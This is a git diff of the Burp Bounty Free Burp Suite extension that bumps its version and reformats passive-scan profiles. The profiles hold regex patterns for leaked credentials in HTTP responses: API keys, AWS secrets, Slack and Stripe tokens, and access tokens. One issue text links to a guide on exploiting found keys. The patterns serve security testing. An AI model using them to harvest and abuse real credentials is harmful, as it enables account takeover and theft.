diff --git a/BappManifest.bmf b/BappManifest.bmf
index 492232b..50e6f34 100644
--- a/BappManifest.bmf
+++ b/BappManifest.bmf
@@ -2,7 +2,7 @@ Uuid: 618f0b2489564607825e93eeed8b9e0a
ExtensionType: 1
Name: Burp Bounty, Scan Check Builder
RepoName: scan-check-builder
-ScreenVersion: 3.2
+ScreenVersion: 4.0
SerialVersion: 21
MinPlatformVersion: 0
ProOnly: True
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 16b2f1f..3fb32ad 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,4 +1,9 @@
## Changelog
+**4.0.0 20210902**
+* Burp Bounty Pro 1.6 core
+* Quick issue alert
+* More options for create profiles
+
**3.6.0 20201005**
* Fixed bug with Match And Replace
* Fixed bug with content-type detection
diff --git a/README.md b/README.md
index cc06216..cd755e5 100644
--- a/README.md
+++ b/README.md
@@ -7,7 +7,7 @@
[![Follow on Twitter](https://img.shields.io/twitter/follow/burpbounty.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=burpbounty)
-# Burp Bounty - Scan Check Builder (BApp Store)
+# Burp Bounty Free - Scan Check Builder (BApp Store)
This Burp Suite extension allows you, in a quick and simple way, to improve the active and passive burpsuite scanner by means of personalized rules through a very intuitive graphical interface. Through an advanced search of patterns and an improvement of the payload to send, we can create our own issue profiles both in the active scanner and in the passive.
diff --git a/profiles/API_Keys.bb b/profiles/API_Keys.bb
old mode 100644
new mode 100755
index d411054..4b19abe
--- a/profiles/API_Keys.bb
+++ b/profiles/API_Keys.bb
@@ -1 +1,92 @@
-[{"Name":"API_Keys","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?:\\s|\u003d|:|\"|^)AKC[a-zA-Z0-9]{10,}","true,Or,^(AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140})","true,Or,[^a-zA-Z0-9](AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140})","true,Or,(?i)github(.{0,20})?(?-i)[\u0027\\\"][0-9a-zA-Z]{35,40}","true,Or,^(EAACEdEose0cBA[0-9A-Za-z]+)","true,Or,[^a-zA-Z0-9](EAACEdEose0cBA[0-9A-Za-z]+)","true,Or,(?i)(facebook|fb)(.{0,20})?(?-i)[\u0027\\\"][0-9a-f]{32}","true,Or,[^a-zA-Z0-9](AIza[0-9A-Za-z-_]{35})","true,Or,^(AIza[0-9A-Za-z-_]{35})","true,Or,(?i)(google|gcp|youtube|drive|yt)(.{0,20})?[\u0027\\\"][AIza[0-9a-z\\\\-_]{35}][\u0027\\\"]","true,Or,^([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})","true,Or,[^a-zA-Z0-9]([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})","true,Or,(?i)heroku.{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}","true,Or,(?i)heroku(.{0,20})?[\u0027\"][0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}[\u0027\"]","true,Or,^([0-9a-f]{32}-us[0-9])","true,Or,[^a-zA-Z0-9]([0-9a-f]{32}-us[0-9])","true,Or,^(key-[0-9a-zA-Z]{32})","true,Or,[^a-zA-Z0-9](key-[0-9a-zA-Z]{32})","true,Or,SG\\.[0-9A-Za-z\\-_]{22}\\.[0-9A-Za-z\\-_]{43}","true,Or,(?i)sauce.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f-]{36}(\\\\\\\"|\u0027|`)?","true,Or,xox.-[0-9]{12}-[0-9]{12}-[0-9a-zA-Z]{24}","true,Or,(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})","true,Or,(xox[baprs]-([0-9a-zA-Z]{10,48})?)","true,Or,https:\\/\\/hooks.slack.com\\/services\\/T[a-zA-Z0-9_]{8}\\/B[a-zA-Z0-9_]{8}\\/[a-zA-Z0-9_]{24}","true,Or,sq0[a-z]{3}-[0-9A-Za-z\\-_]{22,43}","true,Or,(?:r|s)k_live_[0-9a-zA-Z]{24}","true,Or,^(SK[0-9a-fA-F]{32})","true,Or,[^a-zA-Z0-9](SK[0-9a-fA-F]{32})","true,Or,^(R_[0-9a-f]{32})","true,Or,[^a-zA-Z0-9](R_[0-9a-f]{32})","true,Or,(?i)nr-internal-api-key","true,Or,(?i)NRAK-[A-Z0-9]{27}","true,Or,(?i)NRRA-[a-f0-9]{42}","true,Or,(?i)NRAA-[a-f0-9]{27}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"API Key or Token discovered","IssueSeverity":"Medium","IssueConfidence":"Firm","IssueDetail":"API Key or Token discovered, check how to take advantage of it here https://github.com/streaak/keyhacks","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "API_Keys",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?:\\s|\u003d|:|\"|^)AKC[a-zA-Z0-9]{10,}",
+ "true,Or,^(AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140})",
+ "true,Or,[^a-zA-Z0-9](AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140})",
+ "true,Or,(?i)github(.{0,20})?(?-i)[\u0027\\\"][0-9a-zA-Z]{35,40}",
+ "true,Or,^(EAACEdEose0cBA[0-9A-Za-z]+)",
+ "true,Or,[^a-zA-Z0-9](EAACEdEose0cBA[0-9A-Za-z]+)",
+ "true,Or,(?i)(facebook|fb)(.{0,20})?(?-i)[\u0027\\\"][0-9a-f]{32}",
+ "true,Or,[^a-zA-Z0-9](AIza[0-9A-Za-z-_]{35})",
+ "true,Or,^(AIza[0-9A-Za-z-_]{35})",
+ "true,Or,(?i)(google|gcp|youtube|drive|yt)(.{0,20})?[\u0027\\\"][AIza[0-9a-z\\\\-_]{35}][\u0027\\\"]",
+ "true,Or,^([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})",
+ "true,Or,[^a-zA-Z0-9]([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})",
+ "true,Or,(?i)heroku.{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}",
+ "true,Or,(?i)heroku(.{0,20})?[\u0027\"][0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}[\u0027\"]",
+ "true,Or,^([0-9a-f]{32}-us[0-9])",
+ "true,Or,[^a-zA-Z0-9]([0-9a-f]{32}-us[0-9])",
+ "true,Or,^(key-[0-9a-zA-Z]{32})",
+ "true,Or,[^a-zA-Z0-9](key-[0-9a-zA-Z]{32})",
+ "true,Or,SG\\.[0-9A-Za-z\\-_]{22}\\.[0-9A-Za-z\\-_]{43}",
+ "true,Or,(?i)sauce.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f-]{36}(\\\\\\\"|\u0027|`)?",
+ "true,Or,xox.-[0-9]{12}-[0-9]{12}-[0-9a-zA-Z]{24}",
+ "true,Or,(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})",
+ "true,Or,(xox[baprs]-([0-9a-zA-Z]{10,48})?)",
+ "true,Or,https:\\/\\/hooks.slack.com\\/services\\/T[a-zA-Z0-9_]{8}\\/B[a-zA-Z0-9_]{8}\\/[a-zA-Z0-9_]{24}",
+ "true,Or,sq0[a-z]{3}-[0-9A-Za-z\\-_]{22,43}",
+ "true,Or,(?:r|s)k_live_[0-9a-zA-Z]{24}",
+ "true,Or,^(SK[0-9a-fA-F]{32})",
+ "true,Or,[^a-zA-Z0-9](SK[0-9a-fA-F]{32})",
+ "true,Or,^(R_[0-9a-f]{32})",
+ "true,Or,[^a-zA-Z0-9](R_[0-9a-f]{32})",
+ "true,Or,(?i)nr-internal-api-key",
+ "true,Or,(?i)NRAK-[A-Z0-9]{27}",
+ "true,Or,(?i)NRRA-[a-f0-9]{42}",
+ "true,Or,(?i)NRAA-[a-f0-9]{27}"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "API Key or Token discovered",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "API Key or Token discovered, check how to take advantage of it here https://github.com/streaak/keyhacks",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/AWS_Access_Key_ID.bb b/profiles/AWS_Access_Key_ID.bb
old mode 100644
new mode 100755
index fd76611..b272d40
--- a/profiles/AWS_Access_Key_ID.bb
+++ b/profiles/AWS_Access_Key_ID.bb
@@ -1 +1,64 @@
-[{"Name":"AWS_Access_Key_ID","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,[^a-zA-Z0-9](AKIA[a-zA-Z0-9]{16})","true,Or,(AccessKeyId|aws_access_key_id)","true,Or,^(AKIA[a-zA-Z0-9]{16})","true,Or,^((A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})","true,Or,[^a-zA-Z0-9]((A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})"],"Tags":["All","Cloud"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS Access Key ID","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "AWS_Access_Key_ID",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,[^a-zA-Z0-9](AKIA[a-zA-Z0-9]{16})",
+ "true,Or,(AccessKeyId|aws_access_key_id)",
+ "true,Or,^(AKIA[a-zA-Z0-9]{16})",
+ "true,Or,^((A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})",
+ "true,Or,[^a-zA-Z0-9]((A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})"
+ ],
+ "Tags": [
+ "All",
+ "Cloud"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "AWS Access Key ID",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/AWS_Client_Secret.bb b/profiles/AWS_Client_Secret.bb
old mode 100644
new mode 100755
index 51f5481..5fbe718
--- a/profiles/AWS_Client_Secret.bb
+++ b/profiles/AWS_Client_Secret.bb
@@ -1 +1,60 @@
-[{"Name":"AWS_Client_Secret","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(SecretAccessKey|aws_secret_access_key)"],"Tags":["All","Cloud"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS Client Secret","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"AWS Client Secret","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "AWS_Client_Secret",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(SecretAccessKey|aws_secret_access_key)"
+ ],
+ "Tags": [
+ "All",
+ "Cloud"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "AWS Client Secret",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "AWS Client Secret",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/AWS_Creds_File.bb b/profiles/AWS_Creds_File.bb
old mode 100644
new mode 100755
index e578179..59d3e52
--- a/profiles/AWS_Creds_File.bb
+++ b/profiles/AWS_Creds_File.bb
@@ -1 +1,59 @@
-[{"Name":"AWS_Creds_File","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)(aws_access_key_id|aws_secret_access_key)(.{0,20})?\u003d.[0-9a-zA-Z\\/+]{20,40}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS Credential Files","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "AWS_Creds_File",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?i)(aws_access_key_id|aws_secret_access_key)(.{0,20})?\u003d.[0-9a-zA-Z\\/+]{20,40}"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "AWS Credential Files",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/AWS_EC2_Url.bb b/profiles/AWS_EC2_Url.bb
old mode 100644
new mode 100755
index 38e8f50..7576783
--- a/profiles/AWS_EC2_Url.bb
+++ b/profiles/AWS_EC2_Url.bb
@@ -1 +1,59 @@
-[{"Name":"AWS_EC2_Url","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,ec2-[0-9-]+.cd-[a-z0-9-]+.compute.amazonaws.com"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS EC2 Url detected","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "AWS_EC2_Url",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,ec2-[0-9-]+.cd-[a-z0-9-]+.compute.amazonaws.com"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "AWS EC2 Url detected",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/AWS_Region.bb b/profiles/AWS_Region.bb
old mode 100644
new mode 100755
index e85a934..797be35
--- a/profiles/AWS_Region.bb
+++ b/profiles/AWS_Region.bb
@@ -1 +1,59 @@
-[{"Name":"AWS_Region","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(us(-gov)?|ap|ca|cn|eu|sa)-(central|(north|south)?(east|west)?)-\\d"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS Region detected","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "AWS_Region",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(us(-gov)?|ap|ca|cn|eu|sa)-(central|(north|south)?(east|west)?)-\\d"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "AWS Region detected",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/AWS_Secret_Key.bb b/profiles/AWS_Secret_Key.bb
old mode 100644
new mode 100755
index a73c6e4..fd4b305
--- a/profiles/AWS_Secret_Key.bb
+++ b/profiles/AWS_Secret_Key.bb
@@ -1 +1,59 @@
-[{"Name":"AWS_Secret_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)aws(.{0,20})?(?-i)[\u0027\\\"][0-9a-zA-Z\\/+]{40}[\u0027\\\"]"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS Secret Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "AWS_Secret_Key",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?i)aws(.{0,20})?(?-i)[\u0027\\\"][0-9a-zA-Z\\/+]{40}[\u0027\\\"]"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "AWS Secret Key",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/AccessToken.bb b/profiles/AccessToken.bb
new file mode 100755
index 0000000..afa0963
--- /dev/null
+++ b/profiles/AccessToken.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "AccessToken",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,access_token"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
